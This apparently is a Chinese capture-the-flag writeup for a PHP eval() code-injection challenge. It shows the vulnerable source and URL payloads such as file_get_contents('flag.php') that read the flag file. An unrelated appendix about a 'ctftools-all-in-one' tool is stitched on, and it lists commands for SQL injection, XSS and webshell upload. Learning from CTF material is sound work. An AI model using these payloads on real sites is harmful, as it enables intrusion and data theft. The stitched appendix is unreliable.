“百度杯”CTF比赛 2017 二月场--web 爆破-2 writeup

本文解析了通过URL参数注入的方式,在PHP环境中利用全局变量和文件读取函数获取隐藏的Flag。介绍了如何使用file_get_contents和file函数读取文件内容,并成功提取Flag。

题目描述

在这里插入图片描述

解题思路

点击链接得到以下代码:

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
  1. 尝试将hello变为全局变量(GOLBALS)
    在URL后加?hello=$GOLBALS
    结果:
    在这里插入图片描述

得到FLAG

  1. 由第一步可知,flag不在变量中
    猜测flag在文件中,使用file_get_contents() 函数,其作用为把整个文件读入一个字符串中。
    URL?hello=file_get_contents('flag.php')右键源码得到flag
    在这里插入图片描述
  2. 也可在URL后直接加?hello=file('flag.php')
    file() 函数把整个文件读入一个数组在这里插入图片描述
CTF比赛中,使用 `ctftools-all-in-one` 工具可以帮助选手快速定位问题、自动化测试以及提高解题效率。该工具集成了多种Web类题目常用的插件和功能,能够应对常见的漏洞检测与利用景,如SQL注入、XSS、文件包含、目录扫描等。 ### 使用 `ctftools-all-in-one` 解决 Web 类题目的方法 #### 1. **环境准备** 确保你已经下载并安装了 `ctftools-all-in-one` 工具包,同时具备 Python 环境支持。通常该工具依赖于 Python 3 和一些第三方库,例如 `requests`、`BeautifulSoup`、`lxml` 等。 ```bash pip install requests beautifulsoup4 lxml ``` #### 2. **基础扫描功能** `ctftools-all-in-one` 提供了基本的网站扫描功能,可以用于发现隐藏路径、备份文件、常见配置文件等。 ```bash python ctftools.py dirscan -u http://example.com ``` 此命令将对目标网站进行目录扫描,识别 `.git`、`.DS_Store`、`robots.txt`、`backup.zip` 等敏感资源,适用于像引用[4]中提到的源码泄漏情况 [^4]。 #### 3. **SQL 注入检测** 该工具内置 SQL 注入检测模块,可以自动探测是否存在注入点,并尝试提取数据库信息。 ```bash python ctftools.py sqli -u http://example.com/login.php --data "username=admin&password=123" ``` 此命令会对登录接口进行 POST 请求注入测试,适用于 Web 类题目中常见的登录框绕过或数据库信息获取景 [^4]。 #### 4. **XSS 漏洞检测** 对于存在用户输入输出的页面,如留言本、评论框等,`ctftools-all-in-one` 可以自动探测 XSS 漏洞。 ```bash python ctftools.py xss -u http://example.com/submit.php --data "comment=test" ``` #### 5. **文件上传漏洞检测** 该工具支持检测是否存在可利用的文件上传漏洞,并尝试上传 WebShell。 ```bash python ctftools.py upload -u http://example.com/upload.php --file shell.php ``` #### 6. **Cookie 注入与会话劫持** 通过设置自定义 Cookie 或模拟登录,可以尝试进行会话固定、越权访问等操作。 ```bash python ctftools.py cookie -u http://example.com/dashboard.php --cookie "PHPSESSID=abc123xyz" ``` #### 7. **结合实战案例分析** 在实际 CTF 比赛中,Web 题目往往需要综合运用多个技巧。例如,在引用[4]中提到的 `.DS_Store` 泄漏事件,可以通过以下命令检测: ```bash python ctftools.py dsstore -u http://example.com/.DS_Store ``` 该命令将解析 `.DS_Store` 文件内容,提取出可能存在的源码路径,进而下载源码进行审计,寻找 flag 所在位置 。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值